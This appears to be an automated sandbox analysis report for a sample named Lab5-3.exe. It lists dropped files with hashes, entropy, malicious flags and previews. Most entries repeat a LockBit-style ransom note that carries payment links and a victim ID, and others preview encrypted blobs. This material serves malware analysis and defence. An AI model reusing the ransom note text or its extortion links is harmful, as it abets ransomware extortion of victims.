                                                                                                          Preview:y..[.!.u.d.L..f2....c.S2.<..e..".....h......N..2h..u...9B.....V..e>...+q.,T.T..&...M.N.u.H........o^.J?....N..[...E...{."H_.nG.....'e...f....-.w..)<.}..#.u.F..Y.L...!w:.6.j.`...a.#...b......".C.MM_..R.1a.:...+..~..`t..E........u.y.:u8....%).{.......Q.vy...u%....pt..#9.p....KS=s...U.R-...&y..L.F.B|7.S~."..y..6q.'......N....Z......2.!.........>.I.F..+.[....`.O.%......E.._...g..q....b.j:,4vV6....>|.r.......'X.-...:..........$.....j..4..9.?..Pp.,.....>Ot...r.R.<r.L...kQ..A.......x.2..G.r.>.4.F.cM;.}.T.2...E.....ea..%'..U..;..e..~...oL.2Q..D8... ..J,.ZoXB+....i./..%..i_b..L...<...Q.i..zj..<e_A.).......j7.FM9..[g)..K[...#n.....2vQ&\.\.F.PLYD=..%.>.<..)....5X.|...`?.yoTk..t.......[.'......y..s.q.2.....y.4K...,s..T...~.....4iZR....l....].y.....gkw...]'eK..0c.%....N.......T.h..R:........lu..[....@...c..Ps...l...d....7....6..$....lsr.!..y5.X.F. .p..:...8..M7.M....<.!.}............q.]........\..xc#A..R.<5...[=..Wh..\hp...`..UZ. ...B..n
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):186080
                                                                                                          Entropy (8bit):7.998972814540393
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:kaulO3aeSOeR8d0f6yYgp2rJLtKyLSDsClSO5jxegyUUzNRKWyPc+wLJs4Oui5Hs:TjKWea0f6UpuLt56SYFEy0W7l53Vi4qx
                                                                                                          MD5:D2204DA01B417981DF19433F03F43FA2
                                                                                                          SHA1:A2112D5F80F9F813A7B7E895A7F5CF53DBA50B23
                                                                                                          SHA-256:807EDB96E9C2C367788CD4B49F009E2BE37B05039EFD1AA60C260080AA1A608A
                                                                                                          SHA-512:D55A6F145E960AA50A22D19C5204699653CC72859BBFBC96DD3008A10014D06FD7EEC30B46783085D3387A751993C0A9CEEFDE31DCC01C467346CCF0E797BC4B
                                                                                                          Malicious:true
                                                                                                          Preview:....Yt....YS..|...>...J..(.X3..u..m..../h......Z=$o...J9..%...:..W%...}}.q.S."2....b.k,....h.jC.........t*.Y.`D.B!.B.?.A;.B...)(o.\...PU........."g......eQ.z?0A........{...fO..'...+..d..7....G.....M.\.^'u.*........s..7._........0....[.........b.XU5u...eB..&.....bq..*.m..%.TV,Q...Mj.4...a.....].eH.D.y.."..l..]....}^.~.:]....X...h0..q...F[.:Cp..^.j.b......b.ruzLE....D1..$>.Ud..cV..."......\./........|@Y".....N....W..)....WNI.D.E...v..8.......a~...U.&......2.W....w.n..(Q3....[u.;.....5fT.G....u....-7.>....}.....kN<..4.7.=..1......=.;..2.&"...Z%.;..+...E@..0s@.....>4.U.{.%..{.npw.;n..B\+...5..S$@..8..47.j......#.........N$!...v7..K........G5.....2..2.B...:......7...C\pH.X.!4........=.).m....u,._.....#v.......S..>|..Y..y.=.-.../.Ao.......}..|.}!3...L.m.M..)u.71..7.f..!.......*.......lYD.....o.q.Tu.....-s}M\0.........+.....Ej.j.......x...a...`.O4.>.T....6B..........'.@.+..J./0.R...T.w.<8.f...um.~/W....z.x/=....s...R.:=..>I.0.~......\
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):186080
                                                                                                          Entropy (8bit):7.998999229509712
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:q9JYFwBA2qrnGbY+6zXR88OIgRXzyCTekJqIXYefWPka6Rw2Z:qzYTrnIH6zBvObRXzyazqAYefWPkaq5Z
                                                                                                          MD5:6FCEEF7F380CF2E90C6654A19356B83E
                                                                                                          SHA1:1F3812467AA5A642E907495E20B91CA0B6F273DF
                                                                                                          SHA-256:9747849BAF87BD84EEF10E0640756E4C46943519B759619B55DA66D5A34C922B
                                                                                                          SHA-512:FA754DCFACA098C6EE3C675E49682E715FD986D185BC2ED17A00657ACE09CFB048EA14FA746398B5645371C443720BEA7AA878E7ADEE393ADEC2A95F17D283B6
                                                                                                          Malicious:true
                                                                                                          Preview:.&).O.%_.)A......n.2....].6.0z.a...5..3Ix...d.q....s.2Y..rw.u*.|.VU.U]......2.^.i.f.N.....-.f.0l.8&]k....Il.UO..G..M8%..zd~F.......7:..?.....a@*&.zw..E.....Cp..E.9.8.m.&sW....zTy...<..,/..:\0.......r.Je.N'..&'.B.k{.ATY...1...nNu..wY..,/.)...3......}t..BT.L..I ..?'.&}.S..I5.....Z....k.x#c.+....,}.J..:]j.`]....o.d,..|.1.NI.}...Bj2z@4.u..Hd'.$A.>h....z..Q.xJzOG...cI....9..K..{w.H.>z.....jo.U..$.].Y..MP......B...1....o...-K..T..7......U..A.W.P..L.....-|......]^.V......d$..NM...SR....7...[G....C'..?.S..Y......1.D...K......w..,....?.!".6.Ei..[..m.x.....=`...+0.6..vK.....E. <A.ec.".T...@......c.Z..m..^Y.Eg..h...1._.M....0...)A.....M..^;O.e_".*..V.N......h[O."PW<.:..p.....=QeT.Z.-.nc..V.kV.....K7O./..-K...P.o..p....}\.Y........%:......0..i.0.=.2..O{..%..H..$.1..B..`.=>.T..H.....o'~.K.P.hWE.p..p.<L.>8c.yGm."Q.......~j'..0.{%.. A......d(.a..;`....Y}.m..K.,...(.....f..=..T-...N...1...<C.O...c'..8...8A.R.dQ.....vW....m......`.k:.<.*h.H....W.]{pX...[.Q.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):80256
                                                                                                          Entropy (8bit):7.99749043135131
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:cMZol+WAU0KpKFl/6epyBhTkcE6qffqVBLngPYqfoGKOUq13dR5syfggSbPZNjX3:fA+WAUvKF98hzXqHKg1FvUcdEyffwPZp
                                                                                                          MD5:05BE1E896FC461643BF77AC6A69438AD
                                                                                                          SHA1:F60CF3B4E862BB08C3695CD2087CB77916B584EB
                                                                                                          SHA-256:9E7F7DBD473901E263697066EC5C2D102F73F4D2C57B2BE049E23DE081AA17F5
                                                                                                          SHA-512:57496D5434F41E3C5FA51C00B7391F5751C1046C0D88EC8086E8FB5D76F545237798CFC6D9898257EB3D40079F414973E77341048A3FE6CD7C7F0F497742055A
                                                                                                          Malicious:true
                                                                                                          Preview:ML!..Ls...?..].)...g...m...4.~YI.d..uc%....z....g?.g9......g..%..t$....C..;........V.q..9.....b.9.b..m...q....7..M....W8=.U...l.......j.y..k.O.......t.r.d........C.c.....$.9y.=.`...k+a...#-].....L.q..i....u...$.!v......v..tBc..h..q......Hs..rG..S6........I./....)..oBe..g..G.......sX..!.B.J..~j...%RPl...6%...y#.=P....w...V.k.....F......+.`s~.........En..;.>m.\...C.p...u......j.i.N..l5@...2.Y.mOG..t.aU@..p.N...x!."..Uu/..^..c.....<......{*##..a.=.........P.U"..V.........;..uc.n..w..*.....T.Z.#8.~.W.....z...Ex.......w.....n....8v%/".....K#:e.....l&'..V.....7.......(.*T...~q.c...UF.#.=N.1...Z...U.&....&.~8#.mTh.~....#....0[.|.,...}U..H...D6.......V...o.L.R..7 ..r..>..e.2.W.*..7.f....*....C._ph.a.\..).y..t.l.8.,...a.......x..{=..*...O..W.\..f.}.,G.a9+....V....Uuts5.=o...a.R.|[.N6H.....X;A..<.\.~.|9V=.I...J.r...9Qn..e..v..Z...._m..G*..../CDS.q.........aGB.B.3...<......&.v....g.H5...PtO.-.X.].:..h..<D.3.........4.C`...-..........:f......h/.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):67584
                                                                                                          Entropy (8bit):7.997271599480609
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:ajsHjywoyFa0UZtNJGIcye+I1w8OM0NAEn2cnezZ:aXyF0gIcy1I287hDzZ
                                                                                                          MD5:D342429947C4A682180A63139CD11A65
                                                                                                          SHA1:CA79E50A636164E733F6A495F559AC7D56877817
                                                                                                          SHA-256:95EBE5C02654A673E51860DE02889A2CED38C3A6AE21D07B423A0355E5F27C0E
                                                                                                          SHA-512:C8254E85D6804E553AECF9E622588F386F13BD0AE7DFFCC93476E493FD2F7EDFC599F392C2B210AE3046CE11A028EF7E4204BFD82E80FF3EB7FD33DF7FCFC448
                                                                                                          Malicious:true
                                                                                                          Preview:..|....n...0....D...C,].+o.+.2..?y.%Em...E.s{#.U$.)\.......hX...?{..a.0.(..%f....B......*.......|......'.w....?.z..i.n.........H.;:.|..d..I...N......*;4.... oA.%...|..y2..F&.....T=L.T.o.<..b....8q......mE...4#7?../.)%._....O...$m.+.hE...0)J.$X.......VXi(..JV*.n.7..M.s..;5\./GB..J.....@[..k..,...v..Y..x..Dr.6...9. .Y.0/e..............f..m.$..>n.:....?.8i/.r!....{WeU..>...=M7T.,......>.Ag..w...N...f..0..mXx.o.@W................k7_....)I..4..'......v.F.tq.z..~..<KD..&O...n......U..)....t.......k.b..M).f0..H.9|.g.p.!G?B.Y...e8,.7C.......|..z...-.$R..x.Qv..3.C..l\q...T..p.K....%Ne..pT..9c.vh..B..............d..tH(n'.....be...4p.V=...F.Q*.S..*..V.r$.....\..\k..,\*..!....e.az9..=7X.[sl...h!.[........$...x..... ...x.z.7..[r..........\.!...hc...S(s.6..Vr..Rr..nm.=0.+.L...a[.'U..!.#r..5m#S.B-.....#..Q&. eK.4I."]...:.?Q'l...|.+.q....rtL....=}>...s.^...1k..>.|....<..:.B.y.9P.mb<..L....... ."..}(.A[.z..w4...S2.SP.u.h...W.`Xg.....I.......K)U..kA
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):189824
                                                                                                          Entropy (8bit):7.999075675584142
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:a5CPJ5Qo9jEvj3f0XVZIJxCvEkIatdagyhYA5pdDAVdrFz3OHCnRBkDvsqulBHpE:j5Qo9jEvjvRGa/hYA5H8VdRb9nRBkIFe
                                                                                                          MD5:8E3B525C7DC6535A14E2415AC4806706
                                                                                                          SHA1:9FF56E1375E337BC24442027A703DCE2A44AD101
                                                                                                          SHA-256:32A655D7FDE7DFC6CC302ABD645C10EB39EDF7E5B4BE2A24697D6E9D6066D185
                                                                                                          SHA-512:B757AA447D2509A01B731E318BEB5EBA86AC35848B724FF33D33C3749480F15DC86AA089ECDD64E6B549472AD9B34525D7539518D92E896529775164FEFFA8EA
                                                                                                          Malicious:true
                                                                                                          Preview:_.....-2Y...@...g....z.dT......$d....b._.r..x.F.}.1....P.RA..L ...*...^...>..s..Q.J....t*..k.3&C.........]f.i.@$....qq3..e..+2...............D..f.....A%.......L&...9N.R..F.<..y..WN.ib)..w&...R.\..B.%.{7P.Hv.C^..J.a..K(\.D..t..-...!...r.@.k..V....s.q.d.(.dg..eXy...gg.Z.......]d}.X@Am..j..J...a.....J..^V...$..bd#..T.h.......Dy.....Y..t.R.....|..T|.4..:...>.]a.....Y...s.q..`>-n...n..l.^.3......aG`.t...I...JWt*..v..d.%.%.,.......Q\.H..zF...p...U.8-lEU9..).p.@...b..G%.%..I.0..r.j|......hXa.K..;...r....aw.9>F.Scg..........&9F..;v....*s.A.R......!...o.._....<Y..'...).>E....E:C.q........x.fx&eJ...A...w.S-..^@..K..]..P...S......?..iz.=... HJ.....{z".>..k..CE.u6FP-.8.g.....B.0Mc..1....jX..s_.2U9...2.....R{.%lz..'.!...A...D.5..........HR.[o..i.%...q:."...c...Lz...88.Z.KV.....^.ieM.*...E..9....F...U...k.dG.G.Y.}J.....f..X......[.4..4.,(.Xr.u^..n'.WW...:..I.5......eb.f....%"..q.i..r.&.y.........Ni.......h......A..a....K....o.D...d..]?
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
